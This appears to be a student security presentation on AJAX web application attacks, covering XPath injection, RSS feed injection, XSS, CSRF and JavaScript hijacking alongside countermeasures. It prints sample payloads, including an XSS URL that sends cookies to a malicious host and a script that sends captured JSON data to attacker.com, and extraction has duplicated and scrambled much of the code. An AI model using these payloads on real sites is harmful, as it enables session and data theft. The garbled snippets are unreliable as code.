AJAX Security: New Trends in Web Application Attacks

scaredbaconΛογισμικό & κατασκευή λογ/κού

4 Ιουλ 2012 (πριν από 5 χρόνια και 6 μήνες)

493 εμφανίσεις

AJAX Security: New Trends in
Web Application Attacks
Greg Rice
Greg Rice
Iowa State University
Information Assurance Student Group
AJAX
￿
Asynchronous JavaScript And XML
￿
Collection of existing technologies used to
enhance web development
Rapidly increasing buzz in Web 2.0
￿
Rapidly increasing buzz in Web 2.0
￿
Google Maps, GMail, Google Suggest
￿
Ability to exchange data asynchronously with
server without refreshing page
￿
Increase in interactivity, speed
￿
Separation of data, format, style, function
￿
Supported by modern browsers
Conventional Web Apps
￿
Browser loads some HTML FORM
￿
User interacts with FORM, submits
request back to server (
POST, GET
)
request back to server (
POST, GET
)
￿
Server processes client response,
returns new HTML page
Sample Conventional ASP
Form:
<html> <body><h1>Conventional Form Submission</h1>
<form action="conventional.asp" method="post">
Name: <input type="text" name="name" />
Title: <input type="text" name="title" />
Title: <input type="text" name="title" />
<input type="submit" />
</form></body></html>
Response:
<html> <body><H1>Welcome <% response.write(request.form(“name”))
%>!</H1>
You are one great <%
response.write(request.form(“title”)) %> by the
way.</body></html>
Sample ASP Demo
Conventional App
Conventional App
Note the obvious page transition
AJAX Applications
￿
Allows JavaScript to communicate directly with
server JavaScript XMLHttpRequestobject
￿
Exchange data with server without reloading pages
￿
Asynchronous HTTP requests to server occur in
￿
Asynchronous HTTP requests to server occur in
background
￿
Web technologies
￿
XHTML\HTML\CSS –Style
￿
DOM –Dynamic display of information
￿
XML/JSON –Data exchange formats
￿
XMLHttpRequest –Asynchronous data retrieval
￿
JavaScript –Process control
[Source: J.J. Garrett]
<html><body><script type="text/javascript">
function ajaxFunction() {
varxmlHttp;
try {
// Firefox, Opera 8.0+, Safari
xmlHttp=new XMLHttpRequest();
}
catch (e) {
// Internet Explorer 6+
try {
xmlHttp
=new
ActiveXObject
("Msxml2.XMLHTTP");
<%
response.expires=-1
response.write(time)
%>
xmlHttp
=new
ActiveXObject
("Msxml2.XMLHTTP");
}
}
xmlHttp.onreadystatechange=function() {
if(xmlHttp.readyState==4) {
document.myForm.time.value=xmlHttp.responseText;
}
}
xmlHttp.open("GET","time.asp",true);
xmlHttp.send(null);
}
</script><h1>AJAX Form</h1><form name="myForm">
Name: <input type="text" onkeyup="ajaxFunction();" name="name" />
Time: <input type="text" name="time" /></form></body></html>
Sample AJAX Demo
AJAX Enhanced App
AJAX Enhanced App
No page transition!
XML Exchange Example
[Source: OWASP]
XML Upstream Exchange
[Source: OWASP]
[Source: J.J. Garrett]
AJAX Security Implications
￿
Client-side security controls
￿
Increased attack surface
￿
Bridging gap between user and service
￿
Bridging gap between user and service
￿
JavaScript and user requests look
identical –new leverage for XSS
XML Injection Attacks
￿
Once again, epitomizes importance of input
validation at the server
￿
Attackers pass intentionally malformed
payload to server
payload to server
￿
May allow attacker to determine how XML
data is structure, gain access to private XML
data, or simply poison XML data
<?xml version=“1.0” encoding="utf-8"?>
<Employees>
<Employee ID="1">
<FirstName>Arnold</FirstName>
<LastName>Baker</LastName>
<UserName>ABaker</UserName>
<Password>SoSecret</Password>
<Type>Admin</Type>
</Employee>
<?xml version=“1.0” encoding="utf-8"?>
<Employees>
<Employee ID="1">
<FirstName>Arnold</FirstName>
<Employee ID="1">
<FirstName>Arnold</FirstName>
<LastName>Baker</LastName>
<
UserName
>
ABaker
</
UserName
>
</Employee>
<Employee ID="2">
<FirstName>Peter</FirstName>
<LastName>Pan</LastName>
<UserName>PPan</UserName>
<Password>NotTelling</Password>
<Type>User</Type>
</Employee>
</Employees>
<
UserName
>
ABaker
</
UserName
>
<Password>SoSecret</Password>
<Type>Admin</Type>
</Employee>
</Employees>
<?xml version=“1.0” encoding="utf-8"?>
<Employees>
<Employee ID="1">
<FirstName>Arnold</FirstName>
<LastName>Baker</LastName>
<UserName>ABaker</UserName>
Dim FindUserXPathas String
FindUserXPath= "//Employee[UserName/text()='“
& Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
<Password>SoSecret</Password>
<Type>Admin</Type>
</Employee>
<Employee ID="2">
<FirstName>Peter</FirstName>
<LastName>Pan</LastName>
<UserName>PPan</UserName>
<Password>NotTelling</Password>
<Type>User</Type>
</Employee>
</Employees>
Username: blah' or 1=1 or 'a'='a
Password: blah
FindUserXPath=“//Employee[UserName/text()='blah'
or 1=1 or 'a'='a' And Password/text()='blah']”
L
og
i ca
lE qu
i va
l ence:
//Employee[(UserName/text()='blah' or 1=1) or
('a'='a' And Password/text()='blah')]
[Source: OWASP]
Countermeasures
￿
Server-side input validation
￿
Pre-compiled XPath Calls
RSS Feed Injection
￿
RSS\Atom feed allows user or website to
obtain content headlines without visiting site
in question
Problem: trusting third party content
￿
Problem: trusting third party content
￿
Most RSS Readers do not sanitize input;
some even store/execute input in local zone
<?xmlversion="1.0" encoding="ISO-8859-
1"?> <rssversion="2.0"> <channel>
<title> <script>alert('Channel
Title')</script></title>
<link>http://www.mycoolsite.com/</link>
<description> <script>alert('Channel
Description')</script>
</description>
<language>en-us</language>
<copyright>MrCool 2006</copyright>
<script>
varpost_data= 'name=value';
varxmlhttp=new
ActiveXObject("Msxml2.XMLHTTP");
xmlhttp.open("POST",
'http://attackedhost/foo/bar.php',
true);
xmlhttp.onreadystatechange= function
() {
if (
xmlhttp.readyState
== 4) {
<item>
<title> <script>alert('Item
Title')</script> </title>
<link>http://www.mycoolsite.com/lonely.
html</link>
<description> <script>alert('Item
Description')</script>
</description>
<pubDate>Thu, 22 Jun 2006 11:08:14
EDT</pubDate>
<guid>http://mysite/Mrguid</guid>
</item>
</channel>
</rss>
if (
xmlhttp.readyState
== 4) {
alert(xmlhttp.responseText);
}
};
xmlhttp.send(post_data);
</script>
Countermeasures
￿
Input validation of special tags
￿
White listing of allowable HTML tags
￿
End
-
Users should disable script,
￿
End
-
Users should disable script,
applet, and plug-in extensions
Cross-Site Scripting
￿
Recall web browsers execute client-side
Javascript, Flash
￿
Reflected XSS Attack: user input data is
appears in dynamic web content without
appears in dynamic web content without
HTML encoding, allows client-side code to
be injected into the dynamic page
￿
Stored XSS Attack: malicious input data is
stored on the web server and appears for all
other users viewing page
XSS Attack Samples
￿
Normal URL Query:http://www.host.com/query.php?var=insecure
XSS Attack Query:
￿
XSS Attack Query:
http://www.host.com/query.php?var=‘’>
<script>document.location=‘
http://www.malicioussite.com/cgi-bin
/cookietheft.cgi?'%20+document.cookie</script>
Next Generation XSS Attacks
￿
Web 1.0 XSS
￿
Manual injection by attacker
￿
Reflected: Previously attackers needed to trick victim into
opening malicious URL
￿
Stored: Developers could filter tags
￿
Web 2.0 XSS
￿
Asynchronous communication much more complicated,
difficult to notice
￿
Malicious payloads dynamically created by JavaScript,
parsed by JavaScript
￿
Dynamically written to page
￿
XSS can now propagate
Sample AJAX Exchange
[Source: OWASP]
Example XSS Attack
￿
Scenario: Users enter some content later to be
passed exchanged via AJAX JavaScript Array
var downstreamArray = new Array();
var downstreamArray = new Array();
downstreamArray[0] = “Greg”;
￿
Attacker inserts XSS attack
var downstreamArray = new Array();
downstreamArray[0] = “Greg”; doBad();
var bar = “whatever”;
Countermeasures
￿
Input Validation –COMPLEX!
￿
Dangerous character set much larger
￿
Multiple means of escaping
￿
Multiple means of escaping
Cross-Site Request Forgery
￿
Allows control of web application as
authenticated victim
￿
Typically depends on active session
￿
Attacker injects AJAX requests on behalf of
the victim, writing sensitive data
XSRF Attack Example
1.
Victim logs in to AJAX enabled banking website,
receives cookie
2.
In separate tab, victim continues browsing web
3.
With session still valid, victim browses to malicious
3.
With session still valid, victim browses to malicious
web site unknowingly
4.
Malicious site populated with iFrames pointing to
banking website
5.
Forms inject AJAX requests on behalf of the victim
6.
Transactions are silent! No page updates!
Countermeasures
￿
Add cryptographic session token to all
important AJAX requests
￿
Disallow changing that state of app (to
￿
Disallow changing that state of app (to
allow exchange across domains)
JavaScript Hijacking
￿
Problem: JavaScript hosted on any site can
be included and executed in the context of
another site
Scenario: Trick victim into visiting malicious
￿
Scenario: Trick victim into visiting malicious
website again
￿
Attacking site redefines AJAX JavaScript to
redirect confidential traffic
var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
if (req.readyState == 4) {
var txt = req.responseText;
object = eval("(" + txt + ")");
req = null;
}
}
};
req.send(null);
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
"purchases":60000.00, "email":"brian@fortifysoftware.com" },
{"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
"purchases":120000.00, "email":"katrina@fortifysoftware.com" },
{"fname":"Jacob", "lname":"West", "phone":"6502135600",
"purchases":45000.00, "email":"jacob@fortifysoftware.com" }]
<script>
// override the constructor used to create all objects
function Object() {
this.email setter = captureObject;}
// Send the captured object back to the attacker's Web site
function captureObject(x) {
var objString = "";
for (fld in this) {
for (fld in this) {
objString += fld + ": " + this[fld] + ", ";
}
objString += "email: " + x;
var req = new XMLHttpRequest();
req.open("GET", "http://attacker.com?obj=" +
escape(objString),true);
req.send(null);
}
</script>
<!--Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>
Countermeasures
￿
Add cryptographic session token to all
important AJAX requests
￿
Include response prefix to prevent
￿
Include response prefix to prevent
direct execution of response
Other Popular Attacks
￿
SQL\Command Injection
￿
WSDL Enumeration
￿
Ignore Client
-
Side Input Validation
￿
Ignore Client
-
Side Input Validation
￿
Error Handling Enumeration
￿
SOAP Parameter Tampering
￿
Reverse Engineering Binary Clients
Future Web App Trends
￿
AJAX toolkits increasingly in popularity
￿
Increased attack surface –leveraging old attacks,
and now new
￿
More difficult to secure, but also more difficult to
￿
More difficult to secure, but also more difficult to
penetrate
￿
WebScarab, Paros
￿
Firebug
￿
Movement towards online apps necessitates
stronger need for AJAX security understanding
Best Practices
￿
Never trust user input –even when
client-side validation enabled
￿
Disable any additional unneeded
services or apps
Disable any additional unneeded
services or apps
￿
Learn more –WebGoat, OWASP
￿
Assess and audit